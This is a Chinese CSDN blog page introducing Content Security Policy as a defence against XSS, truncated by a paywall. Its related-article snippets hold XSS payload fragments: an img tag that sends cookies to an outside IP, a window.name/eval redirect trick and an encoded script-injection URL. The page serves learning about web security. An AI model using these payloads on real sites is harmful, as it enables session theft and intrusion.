xss加载但没反应——CSP简介与绕过

最新推荐文章于 2024-05-13 06:49:29 发布
最新推荐文章于 2024-05-13 06:49:29 发布
阅读量3k 收藏 1
点赞数
分类专栏: 安全原理 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/122832526
版权

如果xss加载了但是没反应,可能是有CSP—内容安全策略——可以抓包看看有没有Content-Security-Policy

 内容安全策略(CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,明确告诉客户端(制定比较严格的策略和规则),来告诉浏览器什么是被授权执行的与什么是需要被禁止的。即使攻击者发现漏洞,但是它是没办法注入脚本的其被誉为专门为解决XSS攻击而生的神器。

  简单来说,就是我们能够规定,我们的网站只接受我们指定的请求资源。

使用 CSP
  配置内容安全策略涉及到添加 Content-Security-Policy  HTTP头部到一个页面,并配置相应的值,以控制用户代理(浏览器等)可以为该页面获取哪些资源。比如一个可以上传文件和显示图片页面,应该允许图片来自任何地方,但限制表单的action属性只可以赋值为指定的端点。一个经过恰当设计的内容安全策略应该可以有效的保护页面免受跨站脚本攻击。本文阐述如何恰当的构造这样的头部,并提供了一些例子。
制定策略
  你可以使用  Content-Security-Policy HTTP头部 来指定你的策略,像这样:
Content-Security-Policy: policypolicy参数是一个包含了各种描述你的CSP策略指令的字符串。
描述策略
  一个策略由一系列策略指令所组成,每个策略指令都描述了一个针对某个特定类型资源以及生效范围的策略。你的策略应当包含一个default-src策略指令,在其他资源类型没有符合自己的策略时应用该策略(有关完整列表查看default-src )。一个策略可以包含 default-src  或者 script-src (en-US) 指

最低0.47元/天 解锁文章
不想当脚本小子的脚本小子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS防御 内容安全策略 CSP工作原理、配置技巧与最佳实践_安全策略 img-src
m0_61549674的博客
04-06 787
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
合天-web安全-xss-XSS进阶之CSP绕过
weixin_38131137的博客
03-29 597
XSS进阶之CSP绕过 基础知识: CSP:实质就是白名单制度,它规定哪些外部资源可以加载和执行。它的实现和执行全部由浏览器完成。资源加载通过”script-src“、”style-src”等选项来限制外部资源的加载。”script-src”限制外部脚本的加载,strict-dynamic特性允许将信任关系传递给由受信任的script动态生成的脚本,忽略了script-src的白名单,使得之后生成...
XSS防御 内容安全策略 CSP工作原理、配置技巧与最佳实践_安全策略 img-src(3)
最新发布
2401_84264610的博客
05-13 1044
公司部门安全合规改造计划,要求所有的Web站点统一添加CSP规则。对于CSP机制我只是之前在应付面试的时候背过相关的概念,并有真正在项目中实践过。所以希望借助本次改造任务好好理解并实践CSP机制。CSP的全称是,翻译成中文就是内容安全策略。CSP是一个计算机安全标准,通过定义允许在置顶网络应用中加载的来源类型,以保护网页不受跨站站点脚本XSS和数据注入攻击等安全攻击。它的基本工作原理其实就是白名单机制,CSP 通过告诉浏览器一系列规则,严格规定页面中哪些资源允许有哪些来源,不在指定范围内的通通拒绝。
使用无括号的XSS绕过CSP策略研究
weixin_46236101的博客
10-14 606
研究目标 绕过一个严格CSP策略 default-src ‘self’; script-src ‘self’; 技巧点一,无CSP的前提下执行任意XSS payload window.name=eval(alert(1)) location=name 说明: window.name是可以跨域的,这恶意网站上设置window.name,再让受害者访问有xss漏洞的网站,注入xss payload,location=name,即可在有长度限制前提下,执行任意的xss代码。 这个操作绕不过CSP。 技巧点二,ja
CSP里的xss
weixin_30409849的博客
04-08 164
CSP保护下的xss 1.直接嵌入型 <img src="192.168.81.137:80/xss.php?a=[cookie]"> 过滤较少时,优先考虑。触发方式比较直接,直接嵌入能够xss的js代码。 target端 /xx.html <!DOCTYPE html> <html> <head> ...
day38 XSS跨站&绕过修复&http_only&CSP&标签符号
wanjia01的博客
11-22 621
document.cookie//获取当前浏览器cookie信息windows.location.her="xxxx.com'去访问目标网站GET.PHP?
CSP-XSS 风险问题解决
weixin_40795574的博客
03-26 1538
问题 在 chrome 中使用 lighthouse 跑分的时候发现有比较高风险的漏洞,从 lightHouse 建议 入手研究了一番 前言 定义:CSP( Content-Security-Policy )从字面意思来讲是“内容 - 安全 - 政策”。 解释:通俗的讲就是该网页内容的一个安全策略,可以自定义资源的加载规则和资源所在地址源的白名单,用来限制资源是否被允许加载,即当受到 XSS 攻击时,攻击的资源文件所在的地址源不满足 CSP 配置的规则,即攻击资源会加载失败,以此达到防止 XSS 攻击的
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
使用无括号的XSS绕过CSP策略研究 .pdf
09-05
使用无括号的XSS绕过CSP策略研究 安全威胁 大数据 安全运营 业务安全 安全架构
xssCSP
oubasangdadada的博客
03-11 345
CSP CSP的防护 CSP 的核心就是利用同源策略来实现对资源加载的控制,CSP 的一些资源控制: script-src 控制脚本资源 object-src 控制embed, code, archive applet等对像 style-src 控制样式表@import和rel引入的资源 img-src 控制图片资源,包括img的src, CSS3中的url()和image()方法,li...
CSP绕过
weixin_42478365的博客
05-10 2890
01 比赛中常见的绕过CSP 目前在比赛中常见的绕过 CSP 一般是: script-src 'self' 'unsafe-inline' script-src 'self' 'unsafe-eval' script-src 'nonce-*' xx-src self script-src ‘self’ 代表着只能加载符合同源策略的文件,直接插入至 html 页面中的静态 script 标签将无法执行。结合其他 CSP 来看,常用的 iframe,object 等标签也是无法被绕过的。 下面分别分析
xss漏洞,弹不了窗
山兔的博客
05-14 1075
xss漏洞弹不了窗,我们可以试着去获取cookie,或者插入图片
XSS防御之CSP原理学习
weixin_44843084的博客
05-18 1326
XSS防御之CSP原理学习 CSP(Content Security Policy)指的是内容安全策略,为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系统引入了内容安全策略(CSP)的一般概念。这将引入一些相当严格的策略,会使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容。 CSP 本质上是建立白名单,规定了浏览器只能够执行特定来源的代码;即使发生了xss攻击,也不会加载来源不明的第三方脚本。 在网页中,CSP可以通过 HTTP 头信息或者 meta 元素定义
今日偶遇XSS跨站非法参数请求接口问题及解决思路与方案
qq_41543857的博客
12-03 1144
项目场景: 恶意拼接的请求参数导致请求异常 如:http://localhost:8080/项目名/a/后台接口?参数a=4ec986e3f05d2bf3b6d’%22()%26%25%3Cacx%3E%3CScRiPt%20%3EllLO(9789)%3C/ScRiPt%3E 原因分析: 先将上述请求单独拎出来,请求后看页面展示的非法字符是什么 比如我这边是: "> 或者%cs 各种各样的都有 然后此时已经很明了了,我们需要将上述的非法字符再过滤器中过滤掉 解决方案: 首先看项目中是否引用
XSS总结(含绕过)
weixin_50464560的博客
07-28 929
XSS总结 By七友 / 2019-02-16 09:42:00 / 浏览数 35528 <span class="content-...
xssCSP bypass
weixin_50464560的博客
08-09 788
0x01 庐山真面目 —— 何为CSP 看到标题,是否有点疑惑 CSP 是什么东东。简单介绍一下就是浏览器安全策略,如果 标签,或者是服务器中返回 HTTP 头中有 Content-Security-Policy 标签 ,浏览器会根据标签里面的内容,判断哪些资源可以加载或执行。 为了研究CSP(Content Security Policy)对XSS攻击的防护作用,他们做了对CSP安全模型的首次深入分析,分析了CSP标准中对web缺陷的保护能力,帮助识别常见的CSP策略配置的可能错误,并且展示了三类能使
xss之PHP_SELF绕过
03-29
1. 使用CSP(内容安全策略)来限制页面中可以加载的资源。 2. 设置HTTP头中的X-XSS-Protection选项来启用浏览器内置的XSS过滤器。 3. 使用安全的编码方式,如将用户输入作为属性值时使用引号包裹。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值